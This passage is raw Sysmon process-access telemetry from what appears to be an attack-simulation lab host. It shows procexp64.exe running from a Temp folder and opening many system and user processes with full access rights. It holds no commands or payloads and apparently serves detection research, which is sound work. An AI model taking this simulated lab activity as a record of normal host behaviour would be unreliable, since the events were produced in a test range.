15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792141Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792140Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792139Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792138Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792137Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792136Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792135Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792134Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792133Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792132Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792131Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792130Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792129Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792128Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792127Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792126Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792125Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792124Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792123Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792122Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792121Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792120Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792119Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792118Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792117Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792116Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792115Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792114Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792113Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792112Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792111Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792110Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792109Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792108Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792107Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 